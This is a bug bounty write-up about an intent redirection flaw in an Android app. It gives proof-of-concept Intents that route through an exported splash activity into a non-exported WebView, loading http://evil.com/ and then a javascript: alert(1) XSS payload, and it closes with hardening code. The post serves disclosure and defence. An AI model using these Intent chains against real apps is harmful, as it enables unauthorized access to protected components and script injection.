An Interesting Bug I Found in an Android Mobile Application

dnelsaka
3 min readMay 29, 2024


I am writing this article to share an interesting bug that I found in one of the private bug bounty programs on HackerOne. First of all, I would like to thank Sayed Abdelhafiz for helping me get started with Android penetration testing and for guiding me, and of course Sergey Toshin for his write-ups.

Let’s start our journey with the application.

There are two activities involved in this attack:

the first one is a non-exported activity, let’s call it `com.activity.webview`

and the second one is an exported activity, `com.DeeplinkSplashactivity`

First of all, I downloaded the APK `com.private.mobileapp` and started my static analysis. I saw that the activity below is vulnerable to intent redirection, because it starts an intent supplied by the caller (an implicit intent), which can result in opening non-exported activities and content providers.

DirectDeeplinkSplashactivity.java

```java
// Decompiled fragment; the condition of the surrounding if-statement
// is not shown in the original snippet.
    // Caller-controlled Intent taken straight from the extras
    homeActivityIntent = (android.content.Intent) intent2.getParcelableExtra("referrerActivity");
} else {
    homeActivityIntent = activity.getHomeActivityIntent();
}
// The embedded Intent is started without any validation of its target
activity.startActivity(homeActivityIntent);
```

Many developers make use of this feature and create proxy components (activities, broadcast receivers and services) that take an embedded Intent and pass it to dangerous methods like startActivity(), sendBroadcast(), etc. This is dangerous because an attacker can force the app to launch a non-exported component that cannot be launched directly from another app, or to grant the attacker access to its content providers. WebView also sometimes changes a URL from a string to an Intent object, using the Intent.parseUri() method, and passes it to startActivity(). This leads to a violation of Android’s security design.

After looking into which protected components we could reach, I found a non-exported WebView activity that takes a URL as a parameter.

So let’s start with our proof of concept:

Main.java

```java
// Inner Intent: the non-exported WebView activity and the URL it should load
Intent extra = new Intent();
extra.setClassName("com.private.mobileapp", "com.activity.webview");
extra.putExtra("url", "http://evil.com/");

// Outer Intent: the exported splash activity, which forwards the inner Intent
Intent intent = new Intent();
intent.setClassName("com.private.mobileapp", "com.DirectDeeplinkSplashactivity");
intent.putExtra("referrerActivity", extra);
startActivity(intent);
```

And after running the mobile app: boom, it worked.

Let’s try some XSS payloads to raise the impact.

main.java

```java
// Same chain as before, but the URL is a javascript: URI so the WebView
// executes script instead of loading a page
Intent extra = new Intent();
extra.setClassName("com.private.mobileapp", "com.activity.webview");
extra.putExtra("url", "javascript://legitimate.com/%0aalert(1)");

Intent intent = new Intent();
intent.setClassName("com.private.mobileapp", "com.DirectDeeplinkSplashactivity");
intent.putExtra("referrerActivity", extra);
startActivity(intent);
```

And then we got our beautiful alert.

At this point I decided to report it first and then try to raise the impact by accessing private files (/data/data/...) or non-exported content providers, but the permissions were handled perfectly, so I couldn’t reach anything higher than that.
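For the defensive side of both issues above (the splash activity forwarding an arbitrary embedded Intent, and the WebView accepting a javascript: URL), here is an added example of how the proxy activity could be hardened. This is not the app’s code; the class names `SafeDeeplinkSplashActivity` and `HomeActivity` and the helper method names are assumed.

```java
import android.app.Activity;
import android.content.ComponentName;
import android.content.Intent;
import android.content.pm.ActivityInfo;
import android.content.pm.PackageManager;
import android.net.Uri;
import android.os.Bundle;

// Hardened stand-in for the splash activity (assumed name, not the app's code).
public class SafeDeeplinkSplashActivity extends Activity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Intent embedded = getIntent().getParcelableExtra("referrerActivity");
        // Fall back to the home screen unless the embedded Intent passes validation
        Intent target = isSafeToForward(embedded) ? embedded : getHomeActivityIntent();
        startActivity(target);
        finish();
    }

    // Forward only if the Intent resolves to an EXPORTED activity of this app.
    // A non-exported target (such as the internal WebView activity) means the
    // caller is trying to use this activity as a proxy to reach it.
    private boolean isSafeToForward(Intent embedded) {
        if (embedded == null) return false;
        ComponentName cn = embedded.resolveActivity(getPackageManager());
        if (cn == null || !getPackageName().equals(cn.getPackageName())) return false;
        try {
            ActivityInfo info = getPackageManager().getActivityInfo(cn, 0);
            return info.exported;
        } catch (PackageManager.NameNotFoundException e) {
            return false;
        }
    }

    // Check the WebView activity should apply to its "url" extra before loading:
    // accept only http/https, which rejects javascript:, file: and content: URIs.
    static boolean isAllowedWebViewUrl(String url) {
        if (url == null) return false;
        String scheme = Uri.parse(url).getScheme();
        return "https".equalsIgnoreCase(scheme) || "http".equalsIgnoreCase(scheme);
    }

    private Intent getHomeActivityIntent() {
        return new Intent(this, HomeActivity.class); // HomeActivity is assumed
    }
}
```

With this in place, both PoC Intents above fall back to the home activity, and even a direct `javascript:` URL is refused by the scheme check.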

Reported 19 May

Triaged 21 May

Triaged by the internal team and rated Medium severity 28 May

If you need any further assistance, please don’t hesitate to reach out to me on Discord.

Discord : dnelsaka

Oversecured similar bug: Click Here
